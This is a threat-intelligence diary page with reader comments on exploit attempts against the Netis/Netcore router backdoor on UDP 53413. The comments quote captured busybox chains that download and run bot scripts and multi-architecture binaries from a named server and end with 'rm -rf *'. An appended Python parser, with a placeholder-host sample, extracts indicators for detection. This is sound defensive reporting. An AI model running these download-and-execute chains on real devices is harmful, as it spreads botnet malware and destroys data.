Handler on Duty: Didier Stevens
Threat Level: green
Surge in Exploit Attempts for Netis Router Backdoor (UDP53413)
Comments

2024-07-22 12:13:35

This busybox command was sent to the UDP socket:

    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/8UsA.sh; curl -O http://5.59.248.206/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 5.59.248.206 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 5.59.248.206; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.59.248.206 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *

The 8UsA.sh file tries to load and execute the backdoor for 10 different architectures:

    #!/bin/bash
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.x86; curl -O http://5.59.248.206/IGz.x86;cat IGz.x86 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.mips; curl -O http://5.59.248.206/IGz.mips;cat IGz.mips >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.mpsl; curl -O http://5.59.248.206/IGz.mpsl;cat IGz.mpsl >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm; curl -O http://5.59.248.206/IGz.arm;cat IGz.arm >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm5; curl -O http://5.59.248.206/IGz.arm5;cat IGz.arm5 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm6; curl -O http://5.59.248.206/IGz.arm6;cat IGz.arm6 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.arm7; curl -O http://5.59.248.206/IGz.arm7;cat IGz.arm7 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.ppc; curl -O http://5.59.248.206/IGz.ppc;cat IGz.ppc >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.m68k; curl -O http://5.59.248.206/IGz.m68k;cat IGz.m68k >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet
    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.59.248.206/IGz.sh4; curl -O http://5.59.248.206/IGz.sh4;cat IGz.sh4 >Coco.Telnet;chmod +x *;./Coco.Telnet Coco.Telnet

2016-08-01 00:23:46

The devices causing this traffic seem to be IoT devices (DVRs, IPCAMs, etc.), possibly part of LizardStresser or another botnet based on it.

2016-02-03 10:29:11

This appears to be an attack against Netcore routers (UDP port 53413). It attempts to run various busybox / shell commands.
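The command chain quoted in the 2024-07-22 comment above follows the usual IoT downloader pattern: probe for a writable directory, fetch a stager over whichever of HTTP, TFTP or FTP works, mark it executable, run it, then delete the evidence. The Python below is an added example, not part of the diary or its comments, that classifies a captured UDP/53413 payload on exactly those traits and pulls out the download hosts and dropped file names for blocking and hunting; the sample payload is constructed and uses the TEST-NET-1 placeholder 192.0.2.10 in place of the real download server.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of the busybox chain described in the diary comment; the host
# 192.0.2.10 (TEST-NET-1) is a placeholder, not the download server from the comment.
SAMPLE_PAYLOAD = (
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; "
    "wget http://192.0.2.10/8UsA.sh; curl -O http://192.0.2.10/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; "
    "tftp 192.0.2.10 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; "
    "tftp -r t8UsA2.sh -g 192.0.2.10; chmod 777 t8UsA2.sh; sh t8UsA2.sh; "
    "ftpget -v -u anonymous -p anonymous -P 21 192.0.2.10 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; "
    "rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *"
)
# One pattern per transport the chain falls back through (wget/curl, tftp, ftpget).
WRITABLE_DIRS = re.compile(r"cd\s+/tmp\s*\|\|\s*cd\s+/var/run")
URL_RE = re.compile(r"https?://([^/\s;|'\"]+)/?([^\s;|'\"]*)")
TFTP_GET = re.compile(r"\btftp\s+([^\s;]+)\s+-c\s+get\s+([^\s;]+)")
TFTP_R = re.compile(r"\btftp\s+-r\s+([^\s;]+)\s+-g\s+([^\s;]+)")
FTPGET = re.compile(r"\bftpget\b[^;]*?\s(\d{1,3}(?:\.\d{1,3}){3})\s+[^\s;]+\s+([^\s;]+)")

@dataclass
class Verdict:
    hosts: set = field(default_factory=set)    # download servers to block / hunt for
    files: set = field(default_factory=set)    # names dropped into the writable dir
    tools: set = field(default_factory=set)    # transports tried: http, tftp, ftpget
    indicators: list = field(default_factory=list)

    @property
    def is_downloader_chain(self) -> bool:
        # Writable-dir probe + fetch + execution is the signature of this payload class.
        return {"writable_dir_chain", "fetch", "execute"} <= set(self.indicators)

def analyze_payload(payload: str) -> Verdict:
    v = Verdict()
    if WRITABLE_DIRS.search(payload):
        v.indicators.append("writable_dir_chain")
    fetches = (
        [(h, p.rsplit("/", 1)[-1], "http") for h, p in URL_RE.findall(payload)]
        + [(h, f, "tftp") for h, f in TFTP_GET.findall(payload)]
        + [(h, f, "tftp") for f, h in TFTP_R.findall(payload)]
        + [(h, f, "ftpget") for h, f in FTPGET.findall(payload)]
    )
    for host, fname, tool in fetches:
        v.hosts.add(host)
        v.files.add(fname)
        v.tools.add(tool)
    if v.tools: v.indicators.append("fetch")
    if re.search(r"\bsh\s+[^\s;]+\.sh\b|\./[^\s;]+", payload): v.indicators.append("execute")
    if re.search(r"\brm\s+-rf\b", payload): v.indicators.append("cleanup")
    return v
```

On the sample it reports one host, four dropped file names, all three transports and the writable_dir_chain, fetch, execute and cleanup indicators; a payload that lacks the writable-directory probe or any fetch is not flagged.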